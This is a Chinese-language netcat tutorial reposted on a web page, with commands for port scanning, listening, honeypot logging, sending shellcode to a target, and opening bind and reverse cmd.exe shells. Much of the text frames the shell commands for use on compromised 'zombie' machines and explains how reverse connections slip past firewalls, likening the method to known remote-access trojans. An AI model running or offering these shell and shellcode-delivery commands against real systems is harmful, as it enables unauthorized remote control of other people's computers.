您好,登錄后才能下訂單哦!
1)連接到REMOTE主機(jī),例子:
格式:nc -nvv 192.168.x.x 80
講解:連到192.168.x.x的TCP80端口
2)監(jiān)聽LOCAL主機(jī),例子:
格式:nc -l -p 80
講解:監(jiān)聽本機(jī)的TCP80端口
3)掃描遠(yuǎn)程主機(jī),例子:
格式:nc -nvv -w2 -z 192.168.x.x 80-445
講解:掃描192.168.x.x的TCP80到TCP445的所有端口
4)REMOTE主機(jī)綁定SHELL,例子:
格式:nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
講解:綁定REMOTE主機(jī)的CMDSHELL在REMOTE主機(jī)的TCP5354端口
5)REMOTE主機(jī)綁定SHELL并反向連接,例子:
格式:nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
講解:綁定REMOTE主機(jī)的CMDSHELL并反向連接到192.168.x.x的TCP5354端口
6)作***程序用,例子:
格式1:type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80 格式2:nc-nvv192.168.x.x80
講解:連接到192.168.x.x的80端口,并在其管道中發(fā)送'c:\ex ploit.txt'的內(nèi)容(兩種格式確有相同的效果, 真是有異曲同工之妙:P) 附:'c:\exploit.txt'為shellcode等
7)作蜜罐用[1],例子:
格式:nc -L -p 80
講解:使用'-L'(注意L是大寫)可以不停地監(jiān)聽某一個(gè)端口,直到ctrl+c為止
8)作蜜罐用[2],例子:
格式:nc -L -p 80>c:\log.txt
講解:使用'-L'可以不停地監(jiān)聽某一個(gè)端口,直到ctrl+c為止,同時(shí)把結(jié)果輸出到'c:\log.txt'中,如果把'& gt;' 改為'>>'即可以追加日志 附:'c:\log.txt'為日志等
9)作蜜罐用[3],例子:
格式1:nc -L -p 80
格式2:type.exe c:\honeypot.txt|nc -L -p 80
講解:使用'-L'可以不停地監(jiān)聽某一個(gè)端口,直到ctrl+c為止,并把'c:\honeypot.txt'的內(nèi)容'送'入其管道中
命令1:監(jiān)聽命令
nc -l -p port
nc -l -p port > e:\log.dat
nc -l -v -p port
參數(shù)解釋:
-l:監(jiān)聽端口,監(jiān)聽入站信息
-p:后跟本地端口號(hào)
-v:顯示端口的信息,如果使用-vv的話,則會(huì)顯示端口更詳細(xì)的信息
提示:一般大家都愛用-vv
nc -l -p 80
這個(gè)很簡單,監(jiān)聽80端口
如果機(jī)器上運(yùn)行這個(gè)命令,端口80被認(rèn)為是開放的,可以欺騙很多掃描器的哦!
nc -l -p 80 > e:\log.dat
呵呵,功能和上邊一樣,但是后邊加了個(gè)“> e:\log.dat”我想,學(xué)過ECHO那個(gè)命令的人都會(huì)知道吧,是在E盤創(chuàng)建一個(gè)log.dat的日志文件
nc -l -v -p 80
和上邊命令相似,不過這次不是記錄在文件里,而是會(huì)直接顯示在運(yùn)行著NC的屏幕上。
呵呵,講了這么多,來實(shí)踐下
nc -l -v -p 80
然后在瀏覽器中輸入本機(jī)IP:127.0.0.1
呵呵,看到什么?
同樣,上邊兩個(gè)也是一樣,大家自己試驗(yàn)一下吧
命令2:程序定向
nc -l -p port -t -e cmd.exe
本地機(jī): nc -l -p port 或 nc -l -v -p port
目標(biāo)機(jī):nc -e cmd.exe ip port
參數(shù)解釋:
-l、-p兩個(gè)參數(shù)已經(jīng)解釋過了
-e;作用就是程序定向
-t:以telnet的形式來應(yīng)答
例子
nc -l -p 5277 -t -e cmd.exe
知道運(yùn)行在哪里嗎?千萬不要運(yùn)行在自己的機(jī)器上,如果運(yùn)行了,你機(jī)器就會(huì)變成一臺(tái)TELNET的服務(wù)器了,呵呵,解釋一下:監(jiān)聽本地端口5277的入站信息,同時(shí)將CMD.exe這個(gè)程序,重定向到端口5277上,當(dāng)有人連接的時(shí)候,就讓程序CMD.exe以TELNET的形式來響應(yīng)連接要求。
說白了,其實(shí)就是讓他成為一臺(tái)TELNET的肉雞,所以這個(gè)命令要運(yùn)行在你的肉雞上。。(話外音:說這么多遍當(dāng)我們白癡啊,快往下講?。。。?
呵呵,咱們來找臺(tái)肉雞試試,我TELNET IP 5277
HOHO~~如何?
local machine:nc -l -p port ( or nc -l -v -p port )
remote machine:nc -e cmd.exe ip port
大家知道灰鴿子和神偷吧,這兩款工具都是利用了反彈端口型的***,
什么叫反彈端口?就是說,當(dāng)對方中馬后,不用你主動(dòng)和對方連接,也就是說不用從你的client端向?qū)Ψ街鳈C(jī)上運(yùn)行的server端發(fā)送請求連接,而是對方主動(dòng)來連接你這樣就可以使很多防火墻失效,因?yàn)楹芏喾阑饓Χ疾粰z查出站請求的。
這里這兩個(gè)命令結(jié)合在一起后,于那兩款***可以說有異曲同工之效。為什么?咳?。÷犖医o你講?。。。ㄏ冉?00000000RMB學(xué)費(fèi))哇,別殺我?。?!)
nc -l -p 5277 (堅(jiān)聽本地5277端口)
同樣也可以用
nc -l -v -p 5277
運(yùn)行在本地然后在遠(yuǎn)程機(jī)器上,想辦法運(yùn)行
nc -e cmd.exe ip 5277
(你可別真的打“ip”在肉機(jī)上?。┮颍瑇xx.xxx.xxx.xxx這樣??!
呵呵,看看在本地機(jī)器上出現(xiàn)了什么?
這樣就是反彈~~在本地機(jī)器上得到了一個(gè)SHELL
命令3:掃描端口
nc -v ip port
nc -v -z ip port-port
nc -v -z -u ip port-port
參數(shù)解釋:
-z:將輸入輸出關(guān)掉,在掃描時(shí)使用
nc -v ip port
這個(gè)命令是針對某一個(gè)端口進(jìn)行掃描
例如:
nc -v ip 135
掃描遠(yuǎn)程主機(jī)的135端口,這樣獲得了該端口的一些簡單信息,但是針對某些端口,我們還可以獲得更多的信息
例如:80端口
我們可以使用nc -v ip 80 然后使用get方法來獲得對方的WEB服務(wù)器的信息
nc -v -z ip port-port
這個(gè)命令是用來掃描的一個(gè)命令,這個(gè)命令用于快速掃描TCP端口,而port-port則是指定了掃描的端口范圍
例如:
nc -v -z ip 1-200
可以看到我機(jī)器上的1-200的TCP端口的開放情況
nc -v -z -u ip port-port
這個(gè)命令比上個(gè)命令多了個(gè)-u,這個(gè)命令的作用仍然是掃描端口,只是多了一個(gè)-u的參數(shù),是用來掃UDP端口的
例如:
nc -v -z -u ip 1-200
這個(gè)命令就會(huì)掃1-200的UDP端口
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。